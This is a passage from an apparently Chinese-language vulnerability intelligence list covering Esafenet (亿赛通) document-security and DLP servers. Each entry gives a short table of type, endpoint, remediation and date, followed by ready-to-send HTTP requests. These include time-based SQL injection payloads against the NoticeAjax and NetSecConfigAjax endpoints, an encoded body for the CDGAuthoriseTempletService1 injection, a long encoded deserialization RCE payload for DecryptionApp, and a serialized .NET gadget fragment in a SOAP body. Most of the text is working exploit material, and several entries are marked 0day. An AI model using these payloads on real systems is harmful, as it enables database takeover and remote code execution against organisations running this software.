dGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=</strFormAssignment>
<isBase>0</isBase>
</GetChildFormAndEntityList>
</soap:Body>
</soap:Envelope>
亿赛通
亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/CDGServer3/NoticeAjax;Service |
升级系统版本 |
722 |
nday |
漏洞详情
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
command=delNotice¬iceId=123';if?(select?IS_SRVROLEMEMBER('sysadmin'))=1?WAITFOR?DELAY?'0:0:5'--
亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/CDGServer3/NetSecConfigAjax;Service |
WAF封禁路径,等待发布补丁 |
722 |
未知 |
漏洞详情
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Referer:
command=updateNetSec&state=123';if (select IS SRVROLEMEMBER('sysadmin')=1 WAITFOR DELAY '0:0:5'--
command=updateNetSec&state=123';if (select IS SRVROLEMEMBER('sysadmin')=1 WAITFOR DELAY '0:0:5'--
亿赛通电子文档安全管理系统 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/CDGServer3/CDGAuthoriseTempletService1 |
WAF封禁路路径,等待发布补丁 |
807 |
0day |
漏洞详情
POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1
Host:
CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMA
GKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGD
OMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLF
IBAGNJBLHDNBBCNKNLDJINDOCEBFIKAEMNHAPLPHONFGFGIKIAODPKKLMDBNPGPHLNICFP
MAIMFCOAAFINGBKHCKEAOMKBBALOEGJNGOJBLOJIGKKMKPIDMLCGOFIPFLMODDPOOJNJO
GHNNMOJGPKBNDEBEIBACIDFMBIJCJDMGLFGCHAHGBIJONAGEOCIKHKHFCEPHONEMCMOJE
ALFDEKHHIGBCGPKAMKKFNOMJEEINOPOKLEGFLEBIIGAFCDAMAMBFDJPIKCGDFIFMGAFMGFF
CECFMFDGJFGFIGICP
亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/CDGServer3/DecryptionApp?command=GETSYSTEMINFO |
WAF封禁路路径,等待发布补丁 |
812 |
0day |
漏洞详情
POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1
NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOE